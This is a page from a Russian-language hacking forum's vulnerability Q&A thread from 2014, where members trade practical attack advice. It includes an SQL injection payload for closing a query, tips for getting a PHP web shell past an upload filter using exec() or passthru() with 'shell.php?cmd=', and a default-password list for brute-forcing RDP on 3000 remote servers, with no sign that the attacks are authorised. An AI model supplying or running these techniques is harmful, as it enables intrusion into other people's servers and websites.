HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2325 из 2438 « Первая < 13251825222522752315 2321 2322 2323 2324 2325 2326 2327 2328 2329 233523752425 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #23241  
Старый 27.01.2014, 19:24
Facecontrol
Guest
Сообщений: n/a
Провел на форуме:
13805

Репутация: 0
По умолчанию
как найти полный путь к корню сайта
 
Ответить с цитированием

  #23242  
Старый 27.01.2014, 19:40
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию
Цитата:
Сообщение от Facecontrol  
Facecontrol said:
как найти полный путь к корню сайта
phpinfo, ошибки php, подбор пути, исходя из параметров сервера
 
Ответить с цитированием

  #23243  
Старый 27.01.2014, 23:57
Oro4imaru
Guest
Сообщений: n/a
Провел на форуме:
4616

Репутация: 0
По умолчанию
возможно ли провести иньекцыю в запросе

Цитата:
Сообщение от None  
SELECT DISTINCT forum.title from forum AS
forum WHERE forumid IN (2)
ошибка получается в запросе

Цитата:
Сообщение от None  
SELECT DISTINCT forum.title from forum AS
forum WHERE forumid IN (2')
дайте напутствие господа форумчане заранее благодарен
 
Ответить с цитированием

  #23244  
Старый 28.01.2014, 00:41
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Цитата:
Сообщение от Oro4imaru  
Oro4imaru said:
возможно ли провести иньекцыю в запросе
ошибка получается в запросе
дайте напутствие господа форумчане заранее благодарен
Да, надо только закончить логическую структуру запроса!

К примеру:

SELECT DISTINCT forum.title from forum AS

forum WHERE forumid IN (2) and 1=1 -- )
 
Ответить с цитированием

  #23245  
Старый 28.01.2014, 08:56
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585

Репутация: 0
По умолчанию
В админке есть заливка файлов, надо залить шелл. При попытке залить походу срабатывает что-то типо антивирусника или фаервола(заливаю чистый пхп с шеллом-не льется, заливаю пхп файл с phpinfo() - все спокойно выдает).

Че делать?
 
Ответить с цитированием

  #23246  
Старый 28.01.2014, 10:58
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию
Цитата:
Сообщение от Cherep  
Cherep said:
В админке есть заливка файлов, надо залить шелл. При попытке залить походу срабатывает что-то типо антивирусника или фаервола(заливаю чистый пхп с шеллом-не льется, заливаю пхп файл с phpinfo() - все спокойно выдает).
Че делать?
попробуй залить

или passthru(), или exec() вместо system()

будет доступен:

shell.php?cmd=uname
 
Ответить с цитированием

  #23247  
Старый 28.01.2014, 17:07
nike001
Guest
Сообщений: n/a
Провел на форуме:
5283

Репутация: 0
По умолчанию
Знаю, что вопрос немного не по теме, но подходящей я не нашёл.

Есть ли шанс сбрутить дедик с логинами

Код:
Code:
Administrator
admin
и пасами

Код:
Code:
administrator
admin
password
pass
p@ssword
passw0rd
p@ssw0rd
1
12
123
1234
12345
123456
0
00
000
0000
00000
support
123456
У меня 3000 ip-шников. Или словарь надо больше и я впустую потрачу время?
 
Ответить с цитированием

  #23248  
Старый 28.01.2014, 18:08
Cherep
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585

Репутация: 0
По умолчанию
Цитата:
Сообщение от Cherep  
Cherep said:
В админке есть заливка файлов, надо залить шелл. При попытке залить походу срабатывает что-то типо антивирусника или фаервола(заливаю чистый пхп с шеллом-не льется, заливаю пхп файл с phpinfo() - все спокойно выдает).
Че делать?
Вопрос все еще интересен, совет юзера выше не помог

выдает при таком коде вот что:

Код:
Code:
Warning: system() [function.system]: Cannot execute a blank command in тутпуть/wso2.php on line 1
 
Ответить с цитированием

  #23249  
Старый 28.01.2014, 18:22
Unknown
Guest
Сообщений: n/a
Провел на форуме:
114076

Репутация: 54
По умолчанию
Цитата:
Сообщение от nike001  
nike001 said:
Знаю, что вопрос немного не по теме, но подходящей я не нашёл.
Есть ли шанс сбрутить дедик с логинами
Код:
Code:
Administrator
admin
и пасами
Код:
Code:
administrator
admin
password
pass
p@ssword
passw0rd
p@ssw0rd
1
12
123
1234
12345
123456
0
00
000
0000
00000
support
123456
У меня 3000 ip-шников. Или словарь надо больше и я впустую потрачу время?
3000 адресов? Как по-вашему, сколько из них будут живы? На скольких из них будет винда? На скольких из них будет открыт rdp? А на скольких будет такой пароль?
 
Ответить с цитированием

  #23250  
Старый 28.01.2014, 19:03
nike001
Guest
Сообщений: n/a
Провел на форуме:
5283

Репутация: 0
По умолчанию
ну их 200, которые я проверил были все живые, но ни к одному пароль не подошел. Можете подсказать словарь с оптимальным соотношением размер/качество. APPS у меня 5.
 
Ответить с цитированием
Ответ
Страница 2325 из 2438 « Первая < 13251825222522752315 2321 2322 2323 2324 2325 2326 2327 2328 2329 233523752425 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ